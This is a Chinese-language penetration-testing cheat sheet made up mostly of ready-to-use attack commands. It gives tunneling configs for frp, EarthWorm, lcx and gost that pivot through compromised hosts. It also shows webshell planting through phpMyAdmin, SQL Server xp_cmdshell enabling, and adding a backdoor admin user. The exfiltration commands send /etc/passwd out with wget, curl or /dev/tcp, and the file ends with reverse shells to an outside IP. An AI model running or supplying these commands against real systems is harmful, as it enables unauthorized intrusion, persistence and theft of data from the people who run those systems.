pentest笔记

一、Tools

0、工具下载地址

frp:https://diannaobos.com/frp/
proxifier:https://proxifier.soft32.com/
EarthWorm,停止更新-在commit中下载:https://github.com/rootkiter/Binary-files
冰蝎:https://github.com/rebeyond/Behinder/releases
reGeorg:https://github.com/sensepost/reGeorg
lcx下载:https://github.com/UndefinedIdentifier/LCX

gost下载:https://github.com/ginuerzh/gost

1、 frp 无域名 需要vps web-端口转发 测试成功

frpc.ini/跳板

1
2
3
4
5
6
7
8
9
[common]
server_addr = 192.168.8.98
server_port = 7000

[tcp_port]
type = tcp
local_ip = 192.168.59.132
local_port = 80
remote_port = 8080

frps.ini/公网服务器

1
2
[common]
bind_port=7000

2、frp 有域名 需要vps web-端口转发 测试成功

frpc.ini/跳板

1
2
3
4
5
6
7
8
9
[common]
server_addr = 192.168.8.98
server_port = 7000

[web]
type = http
local_ip= 192.168.59.132
local_port = 80
custom_domains = myselfsite.com

frps.ini/公网服务器

1
2
3
[common]
bind_port=7000
vhost_http_port=80

3、frp+proxifier 需要vps socks 测试成功

frpc.ini/跳板

1
2
3
4
5
6
7
8
[common]
server_addr = 192.168.8.98
server_port = 7000

[socks_proxy]
type = tcp
remote_port = 9999
plugin = socks5

frps.ini/公网服务器

1
2
[common]
bind_port=7000

4、ew+proxifier 需要vps socks 测试成功

公网服务器:

1
ew_win32.exe -s rcsocks -l 9999 -e 8888

跳板:

1
ew_win32.exe -s rssocks -d 192.168.8.98 -e 8888

5、reGeorg+proxifier 无需vps 测试失败

本机

1
reGeorgSocksProxy.py -p 9999 -u http://{{跳板ip}}/tunnel.nosocket.php

跳板

1
上传tunnel.nosocket.php即可

6、冰蝎+proxifier 无需vps 测试失败

冰蝎传马-socks转发-使用proxifier本地10086代理即可

7、lcx-端口转发 win10 需要vps 测试成功

192.168.59.133 81为内网服务
跳板

1
Lcx.exe -slave 192.168.8.98 8888 192.168.59.133 81

公网服务器

1
Lcx.exe -listen 8888 9999

访问公网服务器9999

8、gost

gost1

./gost-darwin-amd64-2.11.1 -L rtcp://:8888/localhost:8888 -F forward+ssh://admin:123456@vpsip:2222?ping=60

VPS

./gost-linux-amd64-2.11.1 -L forward+ssh://admin:123456@:2222

进行socks5代理

gost2

VICTIM

./gost2.11.2 -L=socks5://:7777
./gost2.11.2 -L rtcp://0.0.0.0:8888/localhost:7777 -F forward+ssh://admin:123456@121.40.49.4:9898?ping=60

VPS

./gost2.11.2 -L forward+ssh://admin:123456@:9898

socks5为vps:8888

gost3

victim

1
2
./gost2.11.2 -L=socks5://:7777
./gost2.11.2 -L rtcp://0.0.0.0:8888/localhost:7777 -F forward+ssh://admin:123456@81.71.76.112:9898?ping=60

VPS:
./gost2.11.2 -L forward+ssh://admin:123456@:9898

gost 端口转发

TCP 转发

1
gost -L=tcp://:本地使用端口/远程服务IP:远程服务端口

UDP 转发

1
gost -L=udp://:本地使用端口/远程服务IP:远程服务端口

全协议转发(TCP+UDP)

1
gost -L=:本地使用端口/远程服务IP:远程服务端口

二、Command

ps:

ping 探测内网机器存活

for /l %i in (1,1,255) do ping -n 1 -w 60 192.168.1.%i | find "TTL"

linux内网

bashcode

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
#!/bin/bash
 
#########################################
# 格式:                                # 
#   该脚本名  *.*.*.1-255               # 
# 例如:                                # 
#   ping.sh 192.168.100.2-100           # 
#                                       # 
# 文件作用:                            # 
#     pings.sh 子进程脚本ping           # 
#     chip.txt 存放存活主机             # 
#     bchip.txt 存放不存在主机          # 
#                                       # 
#                                       # 
#                                       # 
#########################################
echo '
#!/bin/bash
ping -c 1 $1 1>/dev/null 2>/dev/null
if [ $? -eq 0 ];then
       echo "--------------------- 主机存活: $1" >> chip.txt
else
    echo "$1 不存在!" >> bchip.txt
fi
' > pings.sh
 
##设置ping.sh脚本执行权限,删除记录文件方便二次执行#####
#### chip.txt 存活的ip
####bchip.txt 不存在的ip
chmod u+x pings.sh
rm -f chip.txt bchip.txt >/dev/null 2>&1
 
#获得起始地址 IP地址的最后一位
a=`echo $1 | awk -F "." '{print $4}' | awk -F "-" '{print $1}'`  
#获得结束地址 IP地址的最后一位
b=`echo $1 | awk -F "." '{print $4}' | awk -F "-" '{print $2'}`  
echo " "
 
#字符转数字
a1=$((a))
b1=$((b))
 
#循环创建进程同时去ping多台主机
for ((i=a1;i<=b1;i++))
do
    w=`echo $1 | awk -v name=$i -F "." '{print $1 "." $2 "." $3 "." name}'`
    ./pings.sh $w &
done

run:
for i in $(seq 1 255); do bash scan.sh 10.10.$i.0-255;sleep 1;cat chip.txt;done

code

1
2
3
4
5
6
7
8
9
#!/bin/bash
NET=$1
for I in {1..254};do
	if ping -c 1 -W 1 $NET.$I &>/dev/null; then
	echo -e "\033[32m $NET.$I\033[0m is up"
else 	
	echo -e "\033[31m $NET.$I\033[0m is down"
fi
done

run

1
2
3
bash 123.sh 10.10.1
nohup bash bash.sh 10.10.13 > 10.10.13.txt &
for i in $(seq 150 175);do  bash bash.sh 10.10.$i > 10.10.$i.txt ;done &

phpmyadmin

1
2
3
4
5
6
7
SHOW VARIABLES LIKE '%general%' 
set global general_log=on;
set global general_log_file='C:/phpStudy/WWW/1.php';
select "<?php eval($_POST[cmd]);?>"; 

show variables like ‘%secure_file_priv%’;
select '<?php eval($_POST["pwd"]);?>' into outfile 'C:/phpStudy/WWW/1.php';

新增用户

1
2
3
4
net user test test /add
net localgroup administrators testuser /add
net localgroup users test /del 
net user test 123456       改变test用户密码为123456,不需要知道原密码

sqlserver rce

1
2
3
exec master..xp_cmdshell "whoami"

EXEc sp_configure 'show advanced options',1;RECONFIGURE;exec sp_configure 'xp_cmdshell',1;RECONFIGURE;

docker

docker中 启动所有的容器命令

1
2
3
4
5
docker start $(docker ps -a | awk '{ print $1}' | tail -n +2)

docker中关闭所有的容器命令

docker stop $(docker ps -a | awk '{ print $1}' | tail -n +2)

读文件

1
2
3
wget --post-file=/etc/passwd xxxx
curl -F file=@/etc/passwd xxxx
bash -c 'cat /flag' > /dev/tcp/ip/port

suid提权

1
2
3
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;

压缩

1
find ./ -type f -name '*.php'  | xargs  tar -zcvf /tmp/t.tar.gz

反弹shell

1
2
3
4
netcat 47.xxx.xxx.72 2333 -e /bin/bash
bash -i >& /dev/tcp/47.xxx.xxx.72/2333 0>&1